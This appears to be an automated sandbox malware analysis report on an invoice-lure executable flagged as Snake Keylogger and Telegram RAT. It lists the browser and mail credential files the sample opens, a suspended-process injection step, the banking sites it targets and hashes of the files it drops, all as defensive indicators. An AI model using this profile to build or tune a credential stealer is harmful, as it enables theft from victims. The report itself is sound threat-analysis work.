Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000000.00000002.1871926303.00000000006E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036FD8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.00000000372F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	API call chain: ExitProcess graph end node

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Code function: 0_2_6FF41B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6FF41B63

Enables debug privileges

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Memory allocated: page read and write | page guard

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Process created: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe "C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe"

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Queries volume information: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

0_2_00403359

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: Factura Honorarios 2024-11-17.exe PID: 7628, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: Factura Honorarios 2024-11-17.exe PID: 7628, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: Factura Honorarios 2024-11-17.exe PID: 7628, type: MEMORYSTR

ID:	1557624
Product:	CloudBasic
Start time:	13:48:37
Start date:	18.11.2024
Sample:	Factura Honorarios 2024-11-17.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	2494d7b2fd14dc5604fd6aa412f170fc
SHA1:	dc2b1e324c49c9f0fa446211ed24841c48371ef0
SHA256:	0cf14ff76c5d927ad6de94e8d632592a776adb36c733680fcf6385a5d1fed069
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	75ED96254FBF894E42058062B4B4F0D1	996503F1383B49021EB3427BC28D13B5BBD11977	A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab\Juratid.sta	data	861C5521243EDE7D6A843BED4028EB0A	F8DF496611CD8E97D67CF12C4D5F0A61B8D4B58E	B04DD763C94E3CB7AF32E8ED4F6E2822F51868165B9658632DAF7C3AD5487820
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab\autotypes.ome	data	28C5FEB9676D16DFCAC793FCB586D0BF	7EA42930F4771A57AA51F3A36BD3492A9D423CA2	60753AF58DB3E39BEC4353D9FEB84CA3E597B16B077AAB1CB1DB8F9617DA689A
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab\fonta.jpg	JPEG image data, baseline, precision 8, 300x400, components 3	6CADFF319A0C0C41B7A4DDB8BF97467B	BFFCA9F6851994C709B6DEC83333DA7D6033FE54	402A8F58CB8AA75CF9D7A15F3D7E328F8703CCD7B5378F704D71660283D585F3
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab\kvaksalvere.res	data	B8F536887229B6B6A9D9F1C6BDBC830A	7F6AF7E79427319CD428930CD325EBF234140246	9F084456A8DB39E0BE8FF458A057CC112F28976F50CCDEB6B9968475211E36B6
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab\ters.gra	data	B7786B087E97406D67958314CE8D7DFC	857FBDE03F498A5CF1B386C74485C24633673AF4	7A03749583188B2FBBF13ED0788600C942BBA5FCF4D34BEBBEC2764CB35C2D7B

Windows Analysis Report
Factura Honorarios 2024-11-17.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report Factura Honorarios 2024-11-17.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Factura Honorarios 2024-11-17.exe

Malware Threat Intel
Provided by